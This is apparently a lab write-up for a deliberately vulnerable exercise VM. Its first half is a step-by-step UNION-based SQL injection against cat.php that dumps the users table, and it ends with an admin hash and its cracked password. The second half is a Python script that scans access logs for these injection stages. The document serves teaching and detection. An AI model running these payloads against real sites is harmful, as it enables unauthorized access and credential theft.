This exercise explains how a SQL injection can be used to gain access to the administration console, and how, once in the administration console, you can run commands on the system.
From SQL Injection to Shell VM Download
http://192.168.216.136/cat.php?id=1'
http://192.168.216.136/cat.php?id=1 order by 1
http://192.168.216.136/cat.php?id=1 order by 2
http://192.168.216.136/cat.php?id=1 order by 3
http://192.168.216.136/cat.php?id=1 order by 4
http://192.168.216.136/cat.php?id=1 order by 5 (error)
http://192.168.216.136/cat.php?id=-1 union select 1,2,3,4
http://192.168.216.136/cat.php?id=-1 union select 1,@@version,3,4
http://192.168.216.136/cat.php?id=-1 union select 1,user(),3,4
http://192.168.216.136/cat.php?id=-1 union select 1,table_name,3,4 from information_schema.tables
http://192.168.216.136/cat.php?id=-1 union select 1,column_name,3,4 from information_schema.columns where table_name='users'
http://192.168.216.136/cat.php?id=-1 union select 1,concat(id,0x3a,login,0x3a,password),3,4 from users
1:admin:8efe310f9ab3efeae8d410a8e0166eb2
P4ssw0rd
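
The requests listed above leave a recognisable trail in the web server's access log. The following Python example is added here and is not part of the original exercise; it classifies requests to cat.php by the stage of the injection they correspond to. The log lines are constructed, and the Apache common log format and the client address 203.0.113.5 are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not captured from the exercise VM).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /cat.php?id=1 HTTP/1.1" 200 1543
203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /cat.php?id=1%27 HTTP/1.1" 200 312
203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /cat.php?id=1%20order%20by%205 HTTP/1.1" 200 298
203.0.113.5 - - [01/Jan/2024:10:00:15 +0000] "GET /cat.php?id=-1%20union%20select%201,2,3,4 HTTP/1.1" 200 1490
203.0.113.5 - - [01/Jan/2024:10:00:21 +0000] "GET /cat.php?id=-1+union+select+1,table_name,3,4+from+information_schema.tables HTTP/1.1" 200 9120
203.0.113.5 - - [01/Jan/2024:10:00:30 +0000] "GET /cat.php?id=-1%20UNION%20SELECT%201,concat(id,0x3a,login,0x3a,password),3,4%20from%20users HTTP/1.1" 200 1502
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Checked in order, most specific first; the first matching pattern wins.
STAGES = [
    ("schema-enumeration", re.compile(r"information_schema", re.I)),
    ("union-extraction", re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)),
    ("column-count-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("syntax-probe", re.compile(r"['\"]")),
]

def classify(value):
    """Return None for a plain integer id, otherwise a stage label."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    for label, pattern in STAGES:
        if pattern.search(value):
            return label
    return "non-integer-id"

def scan(log_text, path="/cat.php", param="id"):
    """Return (client, stage, decoded_value) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if url.path != path:
            continue
        # parse_qs percent-decodes the value and turns '+' into a space.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            stage = classify(value)
            if stage:
                findings.append((client, stage, value))
    return findings
```

Any id value that is not a plain integer is reported, so payloads that match none of the patterns in STAGES still surface as non-integer-id.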